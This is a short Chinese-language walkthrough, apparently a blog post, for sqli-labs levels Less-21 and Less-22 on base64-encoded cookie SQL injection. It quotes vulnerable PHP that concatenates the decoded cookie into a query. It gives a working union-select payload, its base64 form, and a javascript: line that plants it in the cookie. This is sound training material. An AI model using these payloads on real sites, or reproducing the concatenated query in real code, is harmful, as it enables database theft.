文章目录

• Less-21
• Less-22

Less-21

此题为SQL注入中的一种注入方式，为cookie注入，具体详解见如下链接
链接：https://blog.csdn.net/LSYZWF/article/details/117072765

Less-22

此题原理和Less-21一致，只是在构造拼接字段有所差异

题目提示为双引号的base64编码cookie注入
可以猜测后面的字段应该是用双引号括起来的
查看源码SQL语句：

$cookee = base64_decode($cookee);
$cookee1 = '"'. $cookee. '"';
echo "<br></font>";
$sql="SELECT * FROM users WHERE username=$cookee1 LIMIT 0,1";

注意第二行，在对cookie进行base64解码后的结果两边加上双引号

查询数据库
编码前:1" union select 1,database(),3#
base64编码后:MSIgdW5pb24gc2VsZWN0IDEsZGF0YWJhc2UoKSwzIw==

设置cookie
可以在地址栏直接设置：
javascript:alert(document.cookie=‘uname=’+escape(‘MSIgdW5pb24gc2VsZWN0IDEsZGF0YWJhc2UoKSwzIw==’))

重新打开网址，得到结果

查表和查字段也是一样，对需要拼接的语句base64编码后设置cookie即可。